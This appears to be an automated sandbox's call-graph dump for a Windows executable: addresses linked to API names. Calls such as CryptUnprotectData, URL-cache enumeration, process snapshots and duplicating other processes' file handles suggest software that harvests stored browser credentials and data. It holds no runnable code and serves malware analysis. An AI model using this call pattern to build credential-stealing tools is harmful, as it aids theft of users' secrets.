38216 44594a 38192->38216 38195 445d3d 38224 40b2cc 27 API calls 38195->38224 38196 445d88 memset memset memset 38199 414c2e 17 API calls 38196->38199 38609 409b98 GetFileAttributesW 38197->38609 38198->38185 38209 445dde 38199->38209 38676 409b98 GetFileAttributesW 38200->38676 38211 445ce1 38201->38211 38202 445bb3 38703 445403 memset 38202->38703 38203 445680 38203->38178 38447 4087b3 memset 38203->38447 38214 445a63 38204->38214 38205 40b2cc 27 API calls 38215 445bf3 38205->38215 38207 445928 38207->38216 38610 40b6ef 38207->38610 38217 40b2cc 27 API calls 38209->38217 38720 409b98 GetFileAttributesW 38211->38720 38212->38189 38222 40b2cc 27 API calls 38214->38222 38578 409d1f wcslen wcslen 38215->38578 38216->38145 38228 4459ed 38216->38228 38227 445def 38217->38227 38218 4459cb 38218->38228 38237 40b6ef 253 API calls 38218->38237 38231 445a94 38222->38231 38234 445d54 _wcsicmp 38224->38234 38226 445665 38594 40b1ab free free 38226->38594 38235 409d1f 6 API calls 38227->38235 38228->38150 38273 445b22 38228->38273 38229->38182 38229->38195 38229->38196 38230 445389 259 API calls 38230->38160 38677 40ae18 38231->38677 38232 44566d 38232->38140 38498 413d4c 38232->38498 38241 445d71 38234->38241 38303 445d67 38234->38303 38244 445e03 38235->38244 38237->38228 38721 445093 23 API calls 38241->38721 38243 44563c 38243->38226 38248 4087b3 338 API calls 38243->38248 38722 409b98 GetFileAttributesW 38244->38722 38245 4456d8 38251 40b2cc 27 API calls 38245->38251 38247 445d83 38247->38182 38248->38243 38250 40b6ef 253 API calls 38250->38182 38256 4456e2 38251->38256 38252 40b2cc 27 API calls 38253 445c23 38252->38253 38258 409d1f 6 API calls 38253->38258 38255 445e12 38263 445e6b 38255->38263 38268 40b2cc 27 API calls 38255->38268 38596 413fa6 _wcsicmp _wcsicmp 38256->38596 38261 445c37 38258->38261 38259 445aa1 38262 445b17 38259->38262 38277 445ab2 memset 38259->38277 38291 409d1f 6 API calls 38259->38291 38299 445389 259 API calls 38259->38299 38684 40add4 38259->38684 38689 40ae51 38259->38689 38260 4456eb 38264 4456fd memset memset memset memset 38260->38264 38265 4457ea 38260->38265 38266 445389 259 API calls 38261->38266 38697 40aebe 38262->38697 38724 445093 23 API calls 38263->38724 38597 409c70 wcscpy wcsrchr 38264->38597 38600 413d29 38265->38600 38272 445c47 38266->38272 38274 445e33 38268->38274 38279 40b2cc 27 API calls 38272->38279 38273->38160 38273->38161 38280 409d1f 6 API calls 38274->38280 38276 445e7e 38281 445f67 38276->38281 38282 40b2cc 27 API calls 38277->38282 38284 445c53 38279->38284 38285 445e47 38280->38285 38286 40b2cc 27 API calls 38281->38286 38282->38259 38283 409c70 2 API calls 38287 44577e 38283->38287 38288 409d1f 6 API calls 38284->38288 38723 409b98 GetFileAttributesW 38285->38723 38290 445f73 38286->38290 38292 409c70 2 API calls 38287->38292 38293 445c67 38288->38293 38295 409d1f 6 API calls 38290->38295 38291->38259 38296 44578d 38292->38296 38297 445389 259 API calls 38293->38297 38294 445e56 38294->38263 38300 445e83 memset 38294->38300 38298 445f87 38295->38298 38296->38265 38302 40b2cc 27 API calls 38296->38302 38297->38160 38727 409b98 GetFileAttributesW 38298->38727 38299->38259 38304 40b2cc 27 API calls 38300->38304 38305 4457a8 38302->38305 38303->38182 38303->38250 38306 445eab 38304->38306 38307 409d1f 6 API calls 38305->38307 38308 409d1f 6 API calls 38306->38308 38309 4457b8 38307->38309 38310 445ebf 38308->38310 38599 409b98 GetFileAttributesW 38309->38599 38312 40ae18 9 API calls 38310->38312 38321 445ef5 38312->38321 38313 4457c7 38313->38265 38315 4087b3 338 API calls 38313->38315 38314 40ae51 9 API calls 38314->38321 38315->38265 38316 445f5c 38318 40aebe FindClose 38316->38318 38317 40add4 2 API calls 38317->38321 38318->38281 38319 40b2cc 27 API calls 38319->38321 38320 409d1f 6 API calls 38320->38321 38321->38314 38321->38316 38321->38317 38321->38319 38321->38320 38323 445f3a 38321->38323 38725 409b98 GetFileAttributesW 38321->38725 38726 445093 23 API calls 38323->38726 38325->38122 38326->38124 38327->38122 38328->38117 38330 40c775 38329->38330 38728 40b1ab free free 38330->38728 38332 40c788 38729 40b1ab free free 38332->38729 38334 40c790 38730 40b1ab free free 38334->38730 38336 40c798 38337 40aa04 free 38336->38337 38338 40c7a0 38337->38338 38731 40c274 memset 38338->38731 38343 40a8ab 9 API calls 38344 40c7c3 38343->38344 38345 40a8ab 9 API calls 38344->38345 38346 40c7d0 38345->38346 38760 40c3c3 38346->38760 38350 40c877 38359 40bdb0 38350->38359 38351 40c86c 38788 4053fe 39 API calls 38351->38788 38354 40c813 _wcslwr 38786 40c634 50 API calls 38354->38786 38356 40c829 wcslen 38357 40c7e5 38356->38357 38357->38350 38357->38351 38785 40a706 wcslen memcpy 38357->38785 38787 40c634 50 API calls 38357->38787 38949 404363 38359->38949 38361 40bf5d 38969 40440c 38361->38969 38365 40b2cc 27 API calls 38366 40be02 wcslen 38365->38366 38366->38361 38371 40be1e 38366->38371 38367 40be26 wcsncmp 38367->38371 38370 40be7d memset 38370->38371 38372 40bea7 memcpy 38370->38372 38371->38361 38371->38367 38371->38370 38371->38372 38373 40bf11 wcschr 38371->38373 38374 40b2cc 27 API calls 38371->38374 38376 40bf43 LocalFree 38371->38376 38972 40bd5d 28 API calls 38371->38972 38973 404423 38371->38973 38372->38371 38372->38373 38373->38371 38375 40bef6 _wcsnicmp 38374->38375 38375->38371 38375->38373 38376->38371 38377 4135f7 38988 4135e0 38377->38988 38380 40b2cc 27 API calls 38381 41360d 38380->38381 38382 40a804 8 API calls 38381->38382 38383 413613 38382->38383 38384 41363e 38383->38384 38386 40b273 27 API calls 38383->38386 38385 4135e0 FreeLibrary 38384->38385 38388 413643 38385->38388 38387 413625 GetProcAddress 38386->38387 38387->38384 38389 413648 38387->38389 38388->38148 38390 413658 38389->38390 38391 4135e0 FreeLibrary 38389->38391 38390->38148 38392 413666 38391->38392 38392->38148 38394 4136e2 38393->38394 38395 413827 38394->38395 38396 4137ac CoTaskMemFree 38394->38396 38592 41366b FreeLibrary 38395->38592 38396->38394 38991 4449b9 38397->38991 38400 4449b9 42 API calls 38402 444b4b 38400->38402 38401 444c15 38404 4449b9 42 API calls 38401->38404 38402->38401 39012 444972 GetVersionExW 38402->39012 38405 444c1f 38404->38405 38405->38132 38406 444b99 memcmp 38411 444b8c 38406->38411 38407 444c0b 39016 444a85 42 API calls 38407->39016 38411->38406 38411->38407 39013 444aa5 42 API calls 38411->39013 39014 40a7a0 GetVersionExW 38411->39014 39015 444a85 42 API calls 38411->39015 38414 40399d 38413->38414 39017 403a16 38414->39017 38416 403a09 39031 40b1ab free free 38416->39031 38418 403a12 wcsrchr 38418->38146 38419 4039a3 38419->38416 38422 4039f4 38419->38422 39028 40a02c CreateFileW 38419->39028 38422->38416 38423 4099c6 2 API calls 38422->38423 38423->38416 38425 414c2e 17 API calls 38424->38425 38426 404048 38425->38426 38427 414c2e 17 API calls 38426->38427 38428 404056 38427->38428 38429 409d1f 6 API calls 38428->38429 38430 404073 38429->38430 38431 409d1f 6 API calls 38430->38431 38432 40408e 38431->38432 38433 409d1f 6 API calls 38432->38433 38434 4040a6 38433->38434 38435 403af5 20 API calls 38434->38435 38436 4040ba 38435->38436 38437 403af5 20 API calls 38436->38437 38438 4040cb 38437->38438 39058 40414f memset 38438->39058 38440 404140 39072 40b1ab free free 38440->39072 38441 4040ec memset 38445 4040e0 38441->38445 38443 404148 38443->38203 38444 4099c6 2 API calls 38444->38445 38445->38440 38445->38441 38445->38444 38446 40a8ab 9 API calls 38445->38446 38446->38445 39085 40a6e6 WideCharToMultiByte 38447->39085 38449 4087ed 39086 4095d9 memset 38449->39086 38452 408953 38452->38203 38453 408809 memset memset memset memset memset 38454 40b2cc 27 API calls 38453->38454 38455 4088a1 38454->38455 38456 409d1f 6 API calls 38455->38456 38457 4088b1 38456->38457 38458 40b2cc 27 API calls 38457->38458 38459 4088c0 38458->38459 38460 409d1f 6 API calls 38459->38460 38461 4088d0 38460->38461 38462 40b2cc 27 API calls 38461->38462 38463 4088df 38462->38463 38464 409d1f 6 API calls 38463->38464 38465 4088ef 38464->38465 38466 40b2cc 27 API calls 38465->38466 38467 4088fe 38466->38467 38468 409d1f 6 API calls 38467->38468 38469 40890e 38468->38469 38470 40b2cc 27 API calls 38469->38470 38471 40891d 38470->38471 38472 409d1f 6 API calls 38471->38472 38473 40892d 38472->38473 39103 409b98 GetFileAttributesW 38473->39103 38475 40893e 38476 408943 38475->38476 38477 408958 38475->38477 38499 40b633 free 38498->38499 38500 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38499->38500 38501 413f00 Process32NextW 38500->38501 38502 413da5 OpenProcess 38501->38502 38503 413f17 CloseHandle 38501->38503 38504 413eb0 38502->38504 38505 413df3 memset 38502->38505 38503->38245 38504->38501 38507 413ebf free 38504->38507 38508 4099f4 3 API calls 38504->38508 39135 413f27 38505->39135 38507->38504 38508->38504 38509 413e37 GetModuleHandleW 38511 413e46 GetProcAddress 38509->38511 38513 413e1f 38509->38513 38511->38513 38512 413e6a QueryFullProcessImageNameW 38512->38513 38513->38509 38513->38512 39140 413959 38513->39140 39156 413ca4 38513->39156 38515 413ea2 CloseHandle 38515->38504 38517 414c2e 17 API calls 38516->38517 38518 403eb7 38517->38518 38519 414c2e 17 API calls 38518->38519 38520 403ec5 38519->38520 38521 409d1f 6 API calls 38520->38521 38522 403ee2 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 403efd 38523->38524 38525 409d1f 6 API calls 38524->38525 38526 403f15 38525->38526 38527 403af5 20 API calls 38526->38527 38528 403f29 38527->38528 38529 403af5 20 API calls 38528->38529 38530 403f3a 38529->38530 38531 40414f 33 API calls 38530->38531 38537 403f4f 38531->38537 38532 403faf 39170 40b1ab free free 38532->39170 38534 403f5b memset 38534->38537 38535 403fb7 38535->38185 38536 4099c6 2 API calls 38536->38537 38537->38532 38537->38534 38537->38536 38538 40a8ab 9 API calls 38537->38538 38538->38537 38540 414c2e 17 API calls 38539->38540 38541 403d26 38540->38541 38542 414c2e 17 API calls 38541->38542 38543 403d34 38542->38543 38544 409d1f 6 API calls 38543->38544 38545 403d51 38544->38545 38546 409d1f 6 API calls 38545->38546 38547 403d6c 38546->38547 38548 409d1f 6 API calls 38547->38548 38549 403d84 38548->38549 38550 403af5 20 API calls 38549->38550 38551 403d98 38550->38551 38552 403af5 20 API calls 38551->38552 38553 403da9 38552->38553 38554 40414f 33 API calls 38553->38554 38560 403dbe 38554->38560 38555 403e1e 39171 40b1ab free free 38555->39171 38557 403dca memset 38557->38560 38558 403e26 38558->38189 38559 4099c6 2 API calls 38559->38560 38560->38555 38560->38557 38560->38559 38561 40a8ab 9 API calls 38560->38561 38561->38560 38563 414b81 9 API calls 38562->38563 38564 414c40 38563->38564 38565 414c73 memset 38564->38565 39172 409cea 38564->39172 38567 414c94 38565->38567 39175 414592 RegOpenKeyExW 38567->39175 38570 414c64 SHGetSpecialFolderPathW 38572 414d0b 38570->38572 38571 414cc1 38573 414cf4 wcscpy 38571->38573 39176 414bb0 wcscpy 38571->39176 38572->38205 38573->38572 38575 414cd2 39177 4145ac RegQueryValueExW 38575->39177 38577 414ce9 RegCloseKey 38577->38573 38579 409d62 38578->38579 38580 409d43 wcscpy 38578->38580 38583 445389 38579->38583 38581 409719 2 API calls 38580->38581 38582 409d51 wcscat 38581->38582 38582->38579 38584 40ae18 9 API calls 38583->38584 38586 4453c4 38584->38586 38585 40ae51 9 API calls 38585->38586 38586->38585 38587 4453f3 38586->38587 38589 40add4 2 API calls 38586->38589 38591 445403 254 API calls 38586->38591 38588 40aebe FindClose 38587->38588 38590 4453fe 38588->38590 38589->38586 38590->38252 38591->38586 38592->38188 38593->38243 38594->38232 38595->38232 38596->38260 38598 409c89 38597->38598 38598->38283 38599->38313 38601 413d39 38600->38601 38602 413d2f FreeLibrary 38600->38602 38603 40b633 free 38601->38603 38602->38601 38604 413d42 38603->38604 38605 40b633 free 38604->38605 38606 413d4a 38605->38606 38606->38140 38607->38144 38608->38192 38609->38207 38611 44db70 38610->38611 38612 40b6fc memset 38611->38612 38613 409c70 2 API calls 38612->38613 38614 40b732 wcsrchr 38613->38614 38615 40b743 38614->38615 38616 40b746 memset 38614->38616 38615->38616 38617 40b2cc 27 API calls 38616->38617 38618 40b76f 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 40b783 38619->38620 39178 409b98 GetFileAttributesW 38620->39178 38622 40b792 38623 40b7c2 38622->38623 38625 409c70 2 API calls 38622->38625 39179 40bb98 38623->39179 38627 40b7a5 38625->38627 38630 40b2cc 27 API calls 38627->38630 38628 40b837 CloseHandle 38632 40b83e memset 38628->38632 38629 40b817 39262 409a45 GetTempPathW 38629->39262 38633 40b7b2 38630->38633 39212 40a6e6 WideCharToMultiByte 38632->39212 38634 409d1f 6 API calls 38633->38634 38634->38623 38635 40b827 CopyFileW 38635->38632 38637 40b866 39213 444432 38637->39213 38640 40bad5 38641 40baeb 38640->38641 38642 40bade DeleteFileW 38640->38642 38645 40b04b ??3@YAXPAX 38641->38645 38642->38641 38643 40b273 27 API calls 38644 40b89a 38643->38644 39259 438552 38644->39259 38647 40baf3 38645->38647 38647->38216 38649 40bacd 39293 443d90 111 API calls 38649->39293 38652 40bac6 39292 424f26 123 API calls 38652->39292 38653 40b8bd memset 39283 425413 17 API calls 38653->39283 38656 425413 17 API calls 38674 40b8b8 38656->38674 38659 40a71b MultiByteToWideChar 38659->38674 38660 40a734 MultiByteToWideChar 38660->38674 38663 40b9b5 memcmp 38663->38674 38664 4099c6 2 API calls 38664->38674 38665 404423 38 API calls 38665->38674 38668 40bb3e memset memcpy 39294 40a734 MultiByteToWideChar 38668->39294 38669 4251c4 137 API calls 38669->38674 38671 40bb88 LocalFree 38671->38674 38674->38652 38674->38653 38674->38656 38674->38659 38674->38660 38674->38663 38674->38664 38674->38665 38674->38668 38674->38669 38675 40ba5f memcmp 38674->38675 39284 4253ef 16 API calls 38674->39284 39285 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38674->39285 39286 4253af 17 API calls 38674->39286 39287 4253cf 17 API calls 38674->39287 39288 447280 memset 38674->39288 39289 447960 memset memcpy memcpy memcpy 38674->39289 39290 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38674->39290 39291 447920 memcpy memcpy memcpy 38674->39291 38675->38674 38676->38218 38678 40aebe FindClose 38677->38678 38679 40ae21 38678->38679 38680 4099c6 2 API calls 38679->38680 38681 40ae35 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 40ae49 38682->38683 38683->38259 38685 40ade0 38684->38685 38686 40ae0f 38684->38686 38685->38686 38687 40ade7 wcscmp 38685->38687 38686->38259 38687->38686 38688 40adfe wcscmp 38687->38688 38688->38686 38690 40ae7b FindNextFileW 38689->38690 38691 40ae5c FindFirstFileW 38689->38691 38692 40ae94 38690->38692 38693 40ae8f 38690->38693 38691->38692 38695 40aeb6 38692->38695 38696 409d1f 6 API calls 38692->38696 38694 40aebe FindClose 38693->38694 38694->38692 38695->38259 38696->38695 38698 40aed1 38697->38698 38699 40aec7 FindClose 38697->38699 38698->38273 38699->38698 38701 4099d7 38700->38701 38702 4099da memcpy 38700->38702 38701->38702 38702->38202 38704 40b2cc 27 API calls 38703->38704 38705 44543f 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 44544f 38706->38707 39652 409b98 GetFileAttributesW 38707->39652 38709 44545e 38710 445476 38709->38710 38711 40b6ef 253 API calls 38709->38711 38712 40b2cc 27 API calls 38710->38712 38711->38710 38713 445482 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 445492 38714->38715 39653 409b98 GetFileAttributesW 38715->39653 38717 4454a1 38718 4454b9 38717->38718 38719 40b6ef 253 API calls 38717->38719 38718->38230 38719->38718 38720->38229 38721->38247 38722->38255 38723->38294 38724->38276 38725->38321 38726->38321 38727->38303 38728->38332 38729->38334 38730->38336 38732 414c2e 17 API calls 38731->38732 38733 40c2ae 38732->38733 38789 40c1d3 38733->38789 38738 40c3be 38755 40a8ab 38738->38755 38739 40afcf 2 API calls 38740 40c2fd FindFirstUrlCacheEntryW 38739->38740 38741 40c3b6 38740->38741 38742 40c31e wcschr 38740->38742 38743 40b04b ??3@YAXPAX 38741->38743 38744 40c331 38742->38744 38745 40c35e FindNextUrlCacheEntryW 38742->38745 38743->38738 38746 40a8ab 9 API calls 38744->38746 38745->38742 38747 40c373 GetLastError 38745->38747 38748 40c33e wcschr 38746->38748 38749 40c3ad FindCloseUrlCache 38747->38749 38750 40c37e 38747->38750 38748->38745 38751 40c34f 38748->38751 38749->38741 38752 40afcf 2 API calls 38750->38752 38753 40a8ab 9 API calls 38751->38753 38754 40c391 FindNextUrlCacheEntryW 38752->38754 38753->38745 38754->38742 38754->38749 38883 40a97a 38755->38883 38758 40a8cc 38758->38343 38759 40a8d0 7 API calls 38759->38758 38888 40b1ab free free 38760->38888 38762 40c3dd 38763 40b2cc 27 API calls 38762->38763 38764 40c3e7 38763->38764 38889 414592 RegOpenKeyExW 38764->38889 38766 40c3f4 38767 40c50e 38766->38767 38768 40c3ff 38766->38768 38782 405337 38767->38782 38769 40a9ce 4 API calls 38768->38769 38770 40c418 memset 38769->38770 38890 40aa1d 38770->38890 38773 40c471 38775 40c47a _wcsupr 38773->38775 38774 40c505 RegCloseKey 38774->38767 38776 40a8d0 7 API calls 38775->38776 38777 40c498 38776->38777 38778 40a8d0 7 API calls 38777->38778 38779 40c4ac memset 38778->38779 38780 40aa1d 38779->38780 38781 40c4e4 RegEnumValueW 38780->38781 38781->38774 38781->38775 38892 405220 38782->38892 38785->38354 38786->38356 38787->38357 38788->38350 38790 40ae18 9 API calls 38789->38790 38791 40c210 38790->38791 38792 40ae51 9 API calls 38791->38792 38793 40c264 38791->38793 38794 40add4 2 API calls 38791->38794 38797 40c231 _wcsicmp 38791->38797 38798 40c1d3 35 API calls 38791->38798 38792->38791 38795 40aebe FindClose 38793->38795 38794->38791 38796 40c26f 38795->38796 38801 40e5ed memset memset 38796->38801 38797->38791 38799 40c248 38797->38799 38798->38791 38814 40c084 22 API calls 38799->38814 38802 414c2e 17 API calls 38801->38802 38803 40e63f 38802->38803 38804 409d1f 6 API calls 38803->38804 38805 40e658 38804->38805 38815 409b98 GetFileAttributesW 38805->38815 38807 40e667 38808 40e680 38807->38808 38809 409d1f 6 API calls 38807->38809 38816 409b98 GetFileAttributesW 38808->38816 38809->38808 38811 40e68f 38812 40c2d8 38811->38812 38817 40e4b2 38811->38817 38812->38738 38812->38739 38814->38791 38815->38807 38816->38811 38838 40e01e 38817->38838 38819 40e593 38820 40e5b0 38819->38820 38821 40e59c DeleteFileW 38819->38821 38822 40b04b ??3@YAXPAX 38820->38822 38821->38820 38824 40e5bb 38822->38824 38823 40e521 38823->38819 38861 40e175 38823->38861 38826 40e5c4 CloseHandle 38824->38826 38827 40e5cc 38824->38827 38826->38827 38829 40b633 free 38827->38829 38828 40e573 38831 40e584 38828->38831 38832 40e57c CloseHandle 38828->38832 38830 40e5db 38829->38830 38834 40b633 free 38830->38834 38882 40b1ab free free 38831->38882 38832->38831 38833 40e540 38833->38828 38881 40e2ab 30 API calls 38833->38881 38836 40e5e3 38834->38836 38836->38812 38839 406214 22 API calls 38838->38839 38840 40e03c 38839->38840 38841 40e16b 38840->38841 38842 40dd85 75 API calls 38840->38842 38841->38823 38843 40e06b 38842->38843 38843->38841 38844 40afcf ??2@YAPAXI ??3@YAXPAX 38843->38844 38845 40e08d OpenProcess 38844->38845 38846 40e152 38845->38846 38847 40e0a4 GetCurrentProcess DuplicateHandle 38845->38847 38850 406214 22 API calls 38846->38850 38854 40e160 38846->38854 38848 40e0d0 GetFileSize 38847->38848 38849 40e14a CloseHandle 38847->38849 38852 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38848->38852 38849->38846 38850->38854 38851 40b04b ??3@YAXPAX 38851->38841 38853 40e0ea 38852->38853 38855 4096dc CreateFileW 38853->38855 38854->38851 38856 40e0f1 CreateFileMappingW 38855->38856 38857 40e140 CloseHandle CloseHandle 38856->38857 38858 40e10b MapViewOfFile 38856->38858 38857->38849 38859 40e13b CloseHandle 38858->38859 38860 40e11f WriteFile UnmapViewOfFile 38858->38860 38859->38857 38860->38859 38862 40e18c 38861->38862 38863 406b90 11 API calls 38862->38863 38864 40e19f 38863->38864 38865 40e1a7 memset 38864->38865 38866 40e299 38864->38866 38872 40e1e8 38865->38872 38867 4069a3 ??3@YAXPAX free 38866->38867 38869 40e2a4 38867->38869 38868 406e8f 13 API calls 38868->38872 38869->38833 38870 406b53 SetFilePointerEx ReadFile 38870->38872 38871 40dd50 _wcsicmp 38871->38872 38872->38868 38872->38870 38872->38871 38873 40e283 38872->38873 38877 40742e 8 API calls 38872->38877 38878 40aae3 wcslen wcslen _memicmp 38872->38878 38879 40e244 _snwprintf 38872->38879 38874 40e291 38873->38874 38875 40e288 free 38873->38875 38876 40aa04 free 38874->38876 38875->38874 38876->38866 38877->38872 38878->38872 38880 40a8d0 7 API calls 38879->38880 38880->38872 38881->38833 38882->38819 38884 40a980 38883->38884 38885 40a995 _wcsicmp 38884->38885 38886 40a99c wcscmp 38884->38886 38887 40a8bb 38884->38887 38885->38884 38886->38884 38887->38758 38887->38759 38888->38762 38889->38766 38891 40aa23 RegEnumValueW 38890->38891 38891->38773 38891->38774 38893 405335 38892->38893 38894 40522a 38892->38894 38893->38357 38895 40b2cc 27 API calls 38894->38895 38896 405234 38895->38896 38897 40a804 8 API calls 38896->38897 38898 40523a 38897->38898 38937 40b273 38898->38937 38900 405248 _mbscpy _mbscat GetProcAddress 38901 40b273 27 API calls 38900->38901 38902 405279 38901->38902 38940 405211 GetProcAddress 38902->38940 38904 405282 38905 40b273 27 API calls 38904->38905 38906 40528f 38905->38906 38941 405211 GetProcAddress 38906->38941 38908 405298 38909 40b273 27 API calls 38908->38909 38910 4052a5 38909->38910 38942 405211 GetProcAddress 38910->38942 38912 4052ae 38913 40b273 27 API calls 38912->38913 38914 4052bb 38913->38914 38943 405211 GetProcAddress 38914->38943 38916 4052c4 38917 40b273 27 API calls 38916->38917 38918 4052d1 38917->38918 38944 405211 GetProcAddress 38918->38944 38920 4052da 38921 40b273 27 API calls 38920->38921 38922 4052e7 38921->38922 38945 405211 GetProcAddress 38922->38945 38924 4052f0 38925 40b273 27 API calls 38924->38925 38926 4052fd 38925->38926 38946 405211 GetProcAddress 38926->38946 38928 405306 38929 40b273 27 API calls 38928->38929 38930 405313 38929->38930 38947 405211 GetProcAddress 38930->38947 38932 40531c 38933 40b273 27 API calls 38932->38933 38934 405329 38933->38934 38948 405211 GetProcAddress 38934->38948 38936 405332 38936->38893 38938 40b58d 27 API calls 38937->38938 38939 40b18c 38938->38939 38939->38900 38940->38904 38941->38908 38942->38912 38943->38916 38944->38920 38945->38924 38946->38928 38947->38932 38948->38936 38950 40440c FreeLibrary 38949->38950 38951 40436d 38950->38951 38952 40a804 8 API calls 38951->38952 38953 404377 38952->38953 38954 404383 38953->38954 38955 404405 38953->38955 38956 40b273 27 API calls 38954->38956 38955->38361 38955->38365 38957 40438d GetProcAddress 38956->38957 38958 40b273 27 API calls 38957->38958 38959 4043a7 GetProcAddress 38958->38959 38960 40b273 27 API calls 38959->38960 38961 4043ba GetProcAddress 38960->38961 38962 40b273 27 API calls 38961->38962 38963 4043ce GetProcAddress 38962->38963 38964 40b273 27 API calls 38963->38964 38965 4043e2 GetProcAddress 38964->38965 38966 4043f1 38965->38966 38967 4043f7 38966->38967 38968 40440c FreeLibrary 38966->38968 38967->38955 38968->38955 38970 404413 FreeLibrary 38969->38970 38971 40441e 38969->38971 38970->38971 38971->38377 38972->38371 38974 40447e 38973->38974 38975 40442e 38973->38975 38976 404485 CryptUnprotectData 38974->38976 38977 40449c 38974->38977 38978 40b2cc 27 API calls 38975->38978 38976->38977 38977->38371 38979 404438 38978->38979 38980 40a804 8 API calls 38979->38980 38981 40443e 38980->38981 38982 404445 38981->38982 38983 404467 38981->38983 38984 40b273 27 API calls 38982->38984 38983->38974 38986 404475 FreeLibrary 38983->38986 38985 40444f GetProcAddress 38984->38985 38985->38983 38987 404460 38985->38987 38986->38974 38987->38983 38989 4135f6 38988->38989 38990 4135eb FreeLibrary 38988->38990 38989->38380 38990->38989 38992 4449c4 38991->38992 38993 444a52 38991->38993 38994 40b2cc 27 API calls 38992->38994 38993->38400 38993->38405 38995 4449cb 38994->38995 38996 40a804 8 API calls 38995->38996 38997 4449d1 38996->38997 38998 40b273 27 API calls 38997->38998 38999 4449dc GetProcAddress 38998->38999 39000 40b273 27 API calls 38999->39000 39001 4449f3 GetProcAddress 39000->39001 39002 40b273 27 API calls 39001->39002 39003 444a04 GetProcAddress 39002->39003 39004 40b273 27 API calls 39003->39004 39005 444a15 GetProcAddress 39004->39005 39006 40b273 27 API calls 39005->39006 39007 444a26 GetProcAddress 39006->39007 39008 40b273 27 API calls 39007->39008 39009 444a37 GetProcAddress 39008->39009 39010 40b273 27 API calls 39009->39010 39011 444a48 GetProcAddress 39010->39011 39011->38993 39012->38411 39013->38411 39014->38411 39015->38411 39016->38401 39018 403a29 39017->39018 39032 403bed memset memset 39018->39032 39020 403ae7 39045 40b1ab free free 39020->39045 39022 403a3f memset 39025 403a2f 39022->39025 39023 403aef 39023->38419 39024 409d1f 6 API calls 39024->39025 39025->39020 39025->39022 39025->39024 39026 409b98 GetFileAttributesW 39025->39026 39027 40a8d0 7 API calls 39025->39027 39026->39025 39027->39025 39029 40a051 GetFileTime CloseHandle 39028->39029 39030 4039ca CompareFileTime 39028->39030 39029->39030 39030->38419 39031->38418 39033 414c2e 17 API calls 39032->39033 39034 403c38 39033->39034 39035 409719 2 API calls 39034->39035 39036 403c3f wcscat 39035->39036 39037 414c2e 17 API calls 39036->39037 39038 403c61 39037->39038 39039 409719 2 API calls 39038->39039 39040 403c68 wcscat 39039->39040 39046 403af5 39040->39046 39043 403af5 20 API calls 39044 403c95 39043->39044 39044->39025 39045->39023 39047 403b02 39046->39047 39048 40ae18 9 API calls 39047->39048 39056 403b37 39048->39056 39049 403bdb 39050 40aebe FindClose 39049->39050 39051 403be6 39050->39051 39051->39043 39052 40ae18 9 API calls 39052->39056 39053 40ae51 9 API calls 39053->39056 39054 40add4 wcscmp wcscmp 39054->39056 39055 40aebe FindClose 39055->39056 39056->39049 39056->39052 39056->39053 39056->39054 39056->39055 39057 40a8d0 7 API calls 39056->39057 39057->39056 39059 409d1f 6 API calls 39058->39059 39060 404190 39059->39060 39073 409b98 GetFileAttributesW 39060->39073 39062 40419c 39063 4041a7 6 API calls 39062->39063 39064 40435c 39062->39064 39067 40424f 39063->39067 39064->38445 39066 40425e memset 39066->39067 39068 404296 wcscpy 39066->39068 39067->39064 39067->39066 39069 409d1f 6 API calls 39067->39069 39070 40a8ab 9 API calls 39067->39070 39074 414842 39067->39074 39068->39067 39069->39067 39071 4042b6 memset memset _snwprintf wcscpy 39070->39071 39071->39067 39072->38443 39073->39062 39077 41443e 39074->39077 39076 414866 39076->39067 39078 41444b 39077->39078 39079 414451 39078->39079 39080 4144a3 GetPrivateProfileStringW 39078->39080 39081 414491 39079->39081 39082 414455 wcschr 39079->39082 39080->39076 39084 414495 WritePrivateProfileStringW 39081->39084 39082->39081 39083 414463 _snwprintf 39082->39083 39083->39084 39084->39076 39085->38449 39087 40b2cc 27 API calls 39086->39087 39088 409615 39087->39088 39089 409d1f 6 API calls 39088->39089 39090 409625 39089->39090 39113 409b98 GetFileAttributesW 39090->39113 39092 409634 39093 409648 39092->39093 39130 4091b8 241 API calls 39092->39130 39095 40b2cc 27 API calls 39093->39095 39097 408801 39093->39097 39096 40965d 39095->39096 39098 409d1f 6 API calls 39096->39098 39097->38452 39097->38453 39099 40966d 39098->39099 39114 409b98 GetFileAttributesW 39099->39114 39101 40967c 39101->39097 39115 409529 39101->39115 39103->38475 39113->39092 39114->39101 39131 4096c3 CreateFileW 39115->39131 39117 409543 39118 409550 GetFileSize 39117->39118 39129 4095cd 39117->39129 39119 409577 CloseHandle 39118->39119 39120 40955f 39118->39120 39121 409585 39119->39121 39119->39129 39122 40afcf 2 API calls 39120->39122 39126 4095c3 39121->39126 39121->39129 39133 408b8d 38 API calls 39121->39133 39123 409569 39122->39123 39132 40a2ef ReadFile 39123->39132 39125 409574 39125->39119 39134 40908b 57 API calls 39126->39134 39129->39097 39130->39093 39131->39117 39132->39125 39133->39121 39134->39129 39162 413f4f 39135->39162 39138 413f37 K32GetModuleFileNameExW 39139 413f4a 39138->39139 39139->38513 39141 413969 wcscpy 39140->39141 39142 41396c wcschr 39140->39142 39145 413a3a 39141->39145 39142->39141 39144 41398e 39142->39144 39167 4097f7 wcslen wcslen _memicmp 39144->39167 39145->38513 39147 41399a 39148 4139a4 memset 39147->39148 39149 4139e6 39147->39149 39168 409dd5 GetWindowsDirectoryW wcscpy 39148->39168 39151 413a31 wcscpy 39149->39151 39152 4139ec memset 39149->39152 39151->39145 39169 409dd5 GetWindowsDirectoryW wcscpy 39152->39169 39153 4139c9 wcscpy wcscat 39153->39145 39155 413a11 memcpy wcscat 39155->39145 39157 413cb0 GetModuleHandleW 39156->39157 39158 413cda 39156->39158 39157->39158 39161 413cbf GetProcAddress 39157->39161 39159 413ce3 GetProcessTimes 39158->39159 39160 413cf6 39158->39160 39159->38515 39160->38515 39161->39158 39163 413f2f 39162->39163 39164 413f54 39162->39164 39163->39138 39163->39139 39165 40a804 8 API calls 39164->39165 39166 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39165->39166 39166->39163 39167->39147 39168->39153 39169->39155 